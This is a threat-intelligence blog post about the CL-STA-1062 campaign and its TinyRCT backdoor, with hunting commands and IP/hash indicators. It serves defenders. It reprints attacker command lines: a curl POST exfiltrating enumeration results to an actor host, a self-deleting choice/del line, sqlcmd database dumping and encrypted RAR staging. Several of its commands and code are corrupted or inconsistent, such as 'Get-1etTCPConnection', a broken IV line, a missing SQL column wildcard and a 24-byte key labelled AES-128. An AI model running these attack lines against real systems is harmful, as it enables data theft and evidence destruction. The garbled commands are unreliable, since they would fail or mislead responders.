CL-STA-1062: The NET Backdoor That’s Eating Southeast Asia’s Energy Sector Alive + Video

Listen to this Post

Featured Image

Introduction

A sophisticated cyber-espionage campaign targeting government entities and critical energy infrastructure across Southeast Asia has been operating undetected since at least March 2022, leveraging a hybrid toolkit of open-source utilities and a previously undocumented .NET backdoor called TinyRCT. The Chinese-speaking threat cluster, tracked as CL-STA-1062 (and known to Cisco Talos as UAT-7237), has successfully compromised at least ten organizations between October and December 2025 alone, deploying web shells, tunneling tools, and custom malware to conduct comprehensive attacks spanning the entire kill chain from initial access to data exfiltration. What makes this campaign particularly alarming is the attackers’ pivot from targeting web hosting infrastructure in Taiwan to infiltrating state-owned energy enterprises, signaling a strategic escalation that demands immediate defensive recalibration.

Learning Objectives

  • Understand the complete infection chain of the CL-STA-1062 campaign, from malicious archive delivery to TinyRCT backdoor deployment
  • Master the technical analysis of TinyRCT’s AES-128 encrypted C2 communication, self-destruct mechanism, and evasion tactics
  • Learn to detect, block, and remediate AppDomainManager Injection attacks and .NET-based backdoors in enterprise Windows environments
  • Acquire practical Linux and Windows command-line skills for forensic investigation and threat hunting against this threat cluster

You Should Know

  1. AppDomainManager Injection: How a Legitimate Executable Becomes a Weapon

The infection chain begins with a seemingly innocuous archive named `chrome_setup.zip` containing three files: a legitimate, signed chrome_setup.exe, a malicious `chrome_setup.exe.config` configuration file, and a malicious DLL (MyAppDomainManager.dll). This exploits the .NET runtime’s trust relationship with its configuration files—a technique mapped to MITRE ATT&CK T1574.014.

When a user executes the legitimate executable, the .NET runtime reads the adjacent configuration file, which forces the loading of the malicious DLL as the application’s manager. The malicious code executes instantly and covertly within the context of a trusted process. Before proceeding, the loader performs a critical environmental check: it verifies that the host process is running from %USERPROFILE%\Downloads. If this check fails—indicating the sample was moved to a sandbox or an analyst’s desktop—the loader terminates immediately.

Step-by-step guide to detecting and blocking AppDomainManager Injection:

  1. Monitor .NET configuration file changes – Use Windows Event Logs (Sysmon Event ID 11 for file creation) to track the appearance of `.exe.config` files in user directories, especially in %USERPROFILE%\Downloads.

  2. Enable AppDomainManager auditing – Add the following registry key to log AppDomainManager loads:

    reg add "HKLM\SOFTWARE\Microsoft.NETFramework" /v AuditAppDomainManager /t REG_DWORD /d 1 /f
    

  3. Deploy application whitelisting – Use Windows Defender Application Control (WDAC) or AppLocker to restrict which executables can run from user-writable directories.

  4. Inspect .NET configuration files – Use the following PowerShell command to find suspicious configuration files that reference AppDomainManager:

    Get-ChildItem -Path C:\ -Filter .exe.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "AppDomainManager"
    

  5. Analyze the malicious DLL – Use `dumpbin` or `ILSpy` to inspect managed assemblies for suspicious entry points:

    dumpbin /exports MyAppDomainManager.dll
    

Or with ILSpy (GUI or command-line):

ilspycmd MyAppDomainManager.dll -o ./decompiled
  1. TinyRCT: A Lightweight .NET RAT with a Self-Destruct Twist

TinyRCT is a C-based remote access Trojan that provides attackers with arbitrary command execution, file enumeration and exfiltration, screen capture, and a unique self-destruct mechanism. Upon execution, the malware performs an environment validation—it explicitly verifies that it was executed from %LOCALAPPDATA%. If executed from any other location, the binary terminates immediately. The malware masquerades as PerfWatson2.exe, mimicking the legitimate telemetry component associated with Microsoft Visual Studio.

Step-by-step guide to analyzing and hunting TinyRCT:

  1. Extract strings and identify the backdoor – Use the `strings` utility (Sysinternals) to identify the hardcoded AES key and C2 addresses:
    strings PerfWatson2.exe | findstr /i "ThisIsASecretKey"
    

    The key is `ThisIsASecretKey87654321` with a null Initialization Vector.

  2. Decrypt TinyRCT’s C2 traffic – The malware uses AES-128 in CBC mode with a hardcoded key. Use the following Python snippet to decrypt intercepted traffic:

    from Crypto.Cipher import AES
    key = b"ThisIsASecretKey87654321"
    iv = b"\x00"  16
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(encrypted_data)
    

  3. Monitor for scheduled tasks – TinyRCT creates a scheduled task named `GoogleUpdaterTaskSystem140.0.7272.0 {ACE7A46F-50FD-481C-AB32-3D838871DB40}` configured to run with highest privileges at user logon. Hunt for this task using:

    schtasks /query /fo table /v | findstr "GoogleUpdaterTaskSystem140"
    

  4. Detect the self-destruct routine – The malware uses `choice.exe` to create a three-second delay before deleting its own executable, ensuring the process has terminated and released its file handle. Monitor for:

    choice /t 3 /d y /n > nul && del /f /q PerfWatson2.exe
    

  5. Block C2 communication – Block outbound connections to the following C2 servers:
    – `139.180.134[.]221`
    – `202.182.102[.]5`
    – `45.76.210[.]43`
    – `45.32.113[.]172`

On Linux-based firewalls:

iptables -A OUTPUT -d 139.180.134.221 -j DROP
iptables -A OUTPUT -d 202.182.102.5 -j DROP
iptables -A OUTPUT -d 45.76.210.43 -j DROP
iptables -A OUTPUT -d 45.32.113.172 -j DROP
  1. The Hybrid Toolkit: Open-Source Tools as Force Multipliers

Beyond custom malware, CL-STA-1062 relies heavily on open-source utilities to move laterally, tunnel traffic, and escalate privileges. The attackers deploy SoftEther VPN, Mimikatz, VNT, and JuicyPotato, often disguising them as legitimate system files such as VMware executables or XDR agents.

Step-by-step guide to detecting and mitigating open-source tool abuse:

  1. Detect disguised SoftEther VPN binaries – The attackers have been observed extracting password-protected RAR archives containing SoftEther VPN binaries masquerading as vmtools.exe. Hunt for unexpected VPN-related processes:
    tasklist /v | findstr /i "vpn softether vmtools"
    

  2. Identify VNT tunneling – VNT has been disguised as a VMware executable. Use the following to detect VNT network activity:

    Get-1etTCPConnection | Where-Object { $<em>.State -eq "Established" -and $</em>.RemotePort -in @(443, 8443, 8080) }
    

  3. Detect JuicyPotato privilege escalation – Monitor for the `JuicyPotato.exe` binary or the `CLSID` abuse pattern:

    Get-WinEvent -LogName Security | Where-Object { $_.Message -match "JuicyPotato|SeImpersonatePrivilege" }
    

  4. Monitor for RAR archive creation – The attackers frequently compress findings into password-protected RAR archives for exfiltration. Alert on:

    rar.exe a -hp -r
    

  5. Block known malicious hashes – Add the following SHA256 hashes to your endpoint protection blocklist:
    – `00e09754526d0fe836ba27e3144ae161b0ecd3774abec5560504a16a67f0087c` (chrome_setup.zip)
    – `4e1f8888d020decd09799ec946f1bf677cac6612b24582ddbf4d8ede425d8384` (TinyRCT)
    – `cbfe8de6ffadbb1d396f61e63eb18e8b11c29527c1528641e3223d4c516cf7c3` (TinyRCT downloader)

4. Network Reconnaissance and Lateral Movement Tactics

The attackers conduct extensive network reconnaissance, using `traceroute` to identify potential lateral movement paths between compromised entities. In one case, they staged and exfiltrated an entire directory of web server source code from a government entity. The attackers use tunneling tools for command and control (C2) and data exfiltration, often disguising them as legitimate system files.

Step-by-step guide to detecting network reconnaissance and lateral movement:

  1. Monitor for traceroute execution – Alert on the use of `tracert.exe` (Windows) or `traceroute` (Linux) from non-administrative hosts:
    Get-WinEvent -LogName Security | Where-Object { $_.Message -match "tracert" }
    

  2. Detect unusual outbound connections – The attackers use `curl` to send enumeration results directly to actor-controlled IP addresses. Monitor for:

    curl -X POST http://[actor-ip]/receive -d @enum_results.txt
    

  3. Identify web shell deployment – ASPX web shells serve as the central mechanism for executing arbitrary commands. Hunt for suspicious ASPX files:

    Get-ChildItem -Path C:\inetpub\wwwroot -Filter .aspx -Recurse | Select-String -Pattern "cmd|exec|shell|wscript"
    

  4. Monitor MSSQL data exfiltration – The attackers have been observed using command-line tools to exfiltrate database information. Alert on:

    sqlcmd -S . -Q "SELECT  FROM ..." -o output.txt
    

  5. Deploy network segmentation – Implement strict micro-segmentation to limit lateral movement between critical infrastructure and government networks.

5. Evasion and Anti-Forensics: The Self-Destruct Capability

TinyRCT’s self-destruct mechanism is a notable feature designed to remove forensic evidence of the infection. Upon receiving the self-destruct command, the malware first deletes the GoogleUpdater scheduled task created by the loader. It then executes a self-deletion routine using a legacy batch command technique involving choice.exe.

Step-by-step guide to forensic recovery and evidence preservation:

  1. Capture memory before self-destruct – Use `dumpit` or `WinDbg` to capture a full memory dump of the infected host before the malware can execute its cleanup routine.

  2. Recover deleted files – Use forensic tools like `FTK Imager` or `Recuva` to recover the deleted `PerfWatson2.exe` from the filesystem.

  3. Analyze scheduled task logs – The scheduled task deletion may still leave traces in the Windows Task Scheduler logs:

    Get-WinEvent -LogName Microsoft-Windows-TaskScheduler/Operational | Where-Object { $_.Message -match "GoogleUpdaterTaskSystem140" }
    

  4. Preserve C2 communication logs – Export firewall and proxy logs to capture the beaconing pattern (default 10-second sleep interval):

    Get-1etTCPConnection | Where-Object { $_.RemoteAddress -in @("139.180.134.221", "45.32.113.172") }
    

  5. Deploy endpoint detection and response (EDR) – Cortex XDR and similar solutions can block TinyRCT execution attempts and alert on the behavioral patterns described in this article.

6. Infrastructure and Indicators of Compromise

The attackers maintain a robust infrastructure spanning multiple IP addresses and domains. Key indicators include:

C2 Servers:

– `139.180.134[.]221`
– `202.182.102[.]5`
– `45.76.210[.]43`
– `45.32.113[.]172`

Malicious URLs:

– `hxxp[:]//139.180.134[.]221/sdksdk608/1.zip`
– `hxxp[:]//139.180.134[.]221/sdksdk608/anydesk%5f0117.zip`
– `hxxp[:]//139.180.134[.]221/PerfWatson2.exe`

Step-by-step guide to implementing IOCs in defensive systems:

  1. Add IPs to firewall blocklists – On Linux (iptables) or Windows Firewall:
    netsh advfirewall firewall add rule name="Block CL-STA-1062 C2" dir=out action=block remoteip=139.180.134.221,202.182.102.5,45.76.210.43,45.32.113.172
    

  2. Deploy DNS sinkhole – Add malicious domains to your DNS sinkhole to prevent resolution.

  3. Update SIEM correlation rules – Add the following logic to detect beaconing patterns:

– Outbound HTTP GET requests to known C2 IPs every 10 seconds
– POST requests with encrypted payloads (AES-128 CBC mode)

  1. Integrate with threat intelligence feeds – Subscribe to Unit 42’s threat intelligence updates to receive real-time IOCs.

  2. Conduct proactive threat hunting – Search your environment for the SHA256 hashes provided above using your EDR or endpoint protection console.

What Undercode Say

  • TinyRCT’s self-destruct mechanism is a game-changer for incident response – The three-second delay using `choice.exe` is deceptively simple but highly effective at evading traditional forensic acquisition. Organizations must implement memory capture and real-time EDR monitoring to catch this malware before it vanishes.

  • The pivot from web hosting to critical infrastructure signals a strategic escalation – CL-STA-1062’s expansion from Taiwan to Southeast Asian energy and government sectors indicates a calculated shift toward high-impact targets. This is not opportunistic hacking; it’s state-aligned espionage with geopolitical implications.

  • Open-source tools remain the attacker’s best friend – The reliance on SoftEther VPN, Mimikatz, VNT, and JuicyPotato demonstrates that detection engineers must focus on behavioral anomalies rather than signature-based alerts. Disguising these tools as VMware executables or XDR agents is a low-effort, high-reward evasion tactic.

  • AppDomainManager Injection is an underrated technique – The use of `.exe.config` files to force malicious DLL loading is a stealthy persistence mechanism that many organizations overlook. Auditing .NET configuration files and implementing application whitelisting are non-1egotiable defenses.

  • Southeast Asia is becoming a prime battleground – With at least ten organizations compromised in a three-month window, the region’s critical infrastructure is under sustained assault. Governments and energy firms must prioritize threat intelligence sharing and joint defense initiatives.

  • The attackers are patient and methodical – Active since at least March 2022, CL-STA-1062 operates with a long-term strategic vision, conducting reconnaissance, lateral movement, and data exfiltration over extended periods. This is not a smash-and-grab operation; it’s a persistent, adaptive threat.

Prediction

  • +1 Expect CL-STA-1062 to expand its targeting to other Southeast Asian nations, including Vietnam, Indonesia, and the Philippines, as the threat cluster continues to refine its TTPs and develop additional custom tooling.

  • -1 The development of TinyRCT marks a dangerous trend: threat actors are investing in bespoke malware to bypass traditional security controls, making detection and remediation significantly more challenging for under-resourced organizations.

  • -1 The use of legitimate signed executables in the infection chain will erode trust in software authenticity, forcing enterprises to implement more rigorous application control and behavioral analysis measures.

  • +1 Palo Alto Networks’ disclosure of this campaign and the associated IOCs will enable the broader security community to develop detections and share intelligence, potentially disrupting CL-STA-1062’s operations in the short term.

  • -1 The geopolitical tensions in the Asia-Pacific region will likely drive increased state-sponsored cyber activity, with energy and government sectors remaining prime targets for espionage and potential disruption campaigns.

▶️ Related Video (86% Match):

https://www.youtube.com/watch?v=u0fAu8IZWZ4

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: We Discovered – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky